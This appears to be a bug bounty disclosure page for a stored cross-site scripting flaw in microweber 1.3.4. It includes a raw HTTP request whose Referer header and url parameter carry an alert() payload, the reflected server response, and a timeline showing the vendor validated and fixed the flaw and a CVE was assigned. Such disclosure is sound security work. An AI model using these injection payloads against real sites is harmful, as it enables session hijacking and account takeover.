We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Stored XSS on Multiple Edit Page in microweber/microweber

Valid

Reported on

Mar 29th 2023

Description

A stored XSS with alert on Editing page.
I clone repo from master branch and build with docker. Footer show: Version: 1.3.4

Proof of Concept

Request image

post

Request raw:

POST /api/save_edit HTTP/1.1
Host: 192.168.125.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-XSRF-TOKEN: eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 2818
Origin: http://192.168.125.131
Connection: close
Referer: http://192.168.125.131/apin0abo'-alert(1)-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1
Cookie: memos_session=MTY3OTkxODY4MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFBZz09fPBd6-5P1k3WJKsaxErdPjFPp6_OkTFmibrRXU0E3jlz; laravel_session=1MLKTpLjLEnXntYlC7Kw07pxYCLz07o4gAQOjbAJ; XSRF-TOKEN=eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CMahzlzZOpS3Y7m6i4lxf5eXVsT2AnzPdq7QstBMlgP6wi0j7xF1htq8P64nT%7C%242y%2410%247pQV%2FPF1ZAtlOQwyplLOYeiS9NPByLu64prJf.h%2FWC8W9zW8Rx7s.; back_to_admin=http%3A//192.168.125.131/admin/view%3Asettings%23option_group%3Dwebsite; mw-back-to-live-edit=true; show-sidebar-layouts=0

data_base64=eyJmaWVsZF9kYXRhXzAiOnsiYXR0cmlidXRlcyI6eyJjbGFzcyI6ImVkaXQgbWFpbi1jb250ZW50IiwicmVsIjoiY29udGVudCIsImZpZWxkIjoiY29udGVudCJ9LCJodG1sIjoiXG4gICAgPGRpdiBjbGFzcz1cIm1vZHVsZSBtb2R1bGUtbGF5b3V0c1wiIGlkPVwibW9kdWxlLWxheW91dHMtMjZcIiBkYXRhLW13LXRpdGxlPVwiTGF5b3V0c1wiIHRlbXBsYXRlPVwic2tpbi0xXCIgZGF0YS10eXBlPVwibGF5b3V0c1wiIHBhcmVudC1tb2R1bGU9XCJsYXlvdXRzXCIgcGFyZW50LW1vZHVsZS1pZD1cIm1vZHVsZS1sYXlvdXRzLTI2XCI%2BXG5cbjxzZWN0aW9uIGNsYXNzPVwic2VjdGlvbiBwLXQtMTAwIHAtYi0xMDAgbm9kcm9wIGNsZWFuLWNvbnRhaW5lciBlZGl0IGNoYW5nZWRcIiBmaWVsZD1cImxheW91dC1za2luLTEtbW9kdWxlLWxheW91dHMtMjZcIiByZWw9XCJtb2R1bGVcIj5cbiAgICA8ZGl2IGNsYXNzPVwiY29udGFpbmVyXCI%2BXG4gICAgICAgIDxkaXYgY2xhc3M9XCJyb3dcIj5cbiAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJjb2wtMTIgY29sLW1kLTEyIGFsbG93LWRyb3AgZWxlbWVudFwiIGlkPVwiZWxlbWVudF8xNjgwMTA1NTE2NzUyXCI%2BXG4gICAgICAgICAgICAgICAgPGRpdiBjbGFzcz1cIm13LXJvd1wiIHN0eWxlPVwiaGVpZ2h0OiBhdXRvO1wiIGlkPVwiZWxlbWVudF9yb3dfMTY4MDEwNTUxNjc1NlwiPlxuICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctY29sXCIgc3R5bGU9XCJ3aWR0aDogMTAwJTsgaGVpZ2h0OiBhdXRvO1wiPlxuICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz1cIm13LWVtcHR5LWVsZW1lbnQgZWxlbWVudFwiIGlkPVwiZWxlbWVudF8xNjgwMTA1NTE2NzU0XCIgc3R5bGU9XCJ2aXNpYmlsaXR5OiB2aXNpYmxlO1wiPjxwIGNsYXNzPVwiZWxlbWVudFwiPjwvcD48L2Rpdj48ZGl2IGNsYXNzPVwibXctY29sLWNvbnRhaW5lciBlbGVtZW50XCI%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgXG4gICAgICAgICAgICAgICAgICAgICAgICA8L3A%2BPC9kaXY%2BXG4gICAgICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgIDwvZGl2PlxuICAgIDwvZGl2PlxuPC9zZWN0aW9uPlxuPC9kaXY%2BXG4ifSwiZmllbGRfZGF0YV8xIjp7ImF0dHJpYnV0ZXMiOnsiY2xhc3MiOiJzZWN0aW9uIHAtdC0xMDAgcC1iLTEwMCBub2Ryb3AgY2xlYW4tY29udGFpbmVyIGVkaXQiLCJmaWVsZCI6ImxheW91dC1za2luLTEtbW9kdWxlLWxheW91dHMtMjYiLCJyZWwiOiJtb2R1bGUifSwiaHRtbCI6IlxuICAgIDxkaXYgY2xhc3M9XCJjb250YWluZXJcIj5cbiAgICAgICAgPGRpdiBjbGFzcz1cInJvd1wiPlxuICAgICAgICAgICAgPGRpdiBjbGFzcz1cImNvbC0xMiBjb2wtbWQtMTIgYWxsb3ctZHJvcCBlbGVtZW50XCIgaWQ9XCJlbGVtZW50XzE2ODAxMDU1MTY3NTJcIj5cbiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctcm93XCIgc3R5bGU9XCJoZWlnaHQ6IGF1dG87XCIgaWQ9XCJlbGVtZW50X3Jvd18xNjgwMTA1NTE2NzU2XCI%2BXG4gICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJtdy1jb2xcIiBzdHlsZT1cIndpZHRoOiAxMDAlOyBoZWlnaHQ6IGF1dG87XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctZW1wdHktZWxlbWVudCBlbGVtZW50XCIgaWQ9XCJlbGVtZW50XzE2ODAxMDU1MTY3NTRcIiBzdHlsZT1cInZpc2liaWxpdHk6IHZpc2libGU7XCI%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BPC9wPjwvZGl2PjxkaXYgY2xhc3M9XCJtdy1jb2wtY29udGFpbmVyIGVsZW1lbnRcIj48cCBjbGFzcz1cImVsZW1lbnRcIj5cbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBcbiAgICAgICAgICAgICAgICAgICAgICAgIDwvcD48L2Rpdj5cbiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICA8L2Rpdj5cbiAgICAgICAgPC9kaXY%2BXG4gICAgPC9kaXY%2BXG4ifSwiaXNfZHJhZnQiOnRydWV9

Response:

{"new_page_url":"http:\/\/192.168.125.131\/apin0abo'-alert(1)-'rzdwg\/file-manager\/list","0":{"rel_type":"module","rel_id":0,"value":"\n    <div class=\"container\">\n        <div class=\"row\">\n            <div class=\"col-12 col-md-12 allow-drop element\" id=\"element_1680105516752\">\n                <div class=\"mw-row\" style=\"height: auto;\" id=\"element_row_1680105516756\">\n                    <div class=\"mw-col\" style=\"width: 100%; height: auto;\">\n                        <div class=\"mw-empty-element element\" id=\"element_1680105516754\" style=\"visibility: visible;\"><p class=\"element\"><\/p><\/div><div class=\"mw-col-container element\"><p class=\"element\">\n                            \n                        <\/p><\/div>\n                    <\/div>\n                <\/div>\n            <\/div>\n        <\/div>\n    <\/div>\n","field":"layout-skin-1-module-layouts-26","is_draft":1,"url":"apin0abo'-alert(1)-'rzdwg\/file-manager\/list"}}

Note:

Edit header:
Referer: http://192.168.125.131/apin0abo'-alert('tuanth1997')-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1

Alert

Example Image
Video POC 1
Video POC 2

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. The attacker can carry out any of the actions of user

Occurrences

Example Image Payload: change parameter url in request to

url=apin0abo%27-alert%285%29-%27rzdwg

Example Image

Edit header:
Referer: http://192.168.125.131/apin0abo'-alert('tuanth1997')-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1
We are processing your report and will contact the microweber team within 24 hours. 6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
We have contacted a member of the microweber team and are waiting to hear back 6 months ago
TuanTH
4 months ago

Researcher

hi @microweber do you have any update for this post?

Peter Ivanov modified the Severity from Medium (4) to Low (3.8) 3 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 3 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 2.0 with commit 42efa9 3 months ago
Peter Ivanov has been awarded the fix bounty
This vulnerability has been assigned a CVE
Peter Ivanov published this vulnerability 3 months ago
to join this conversation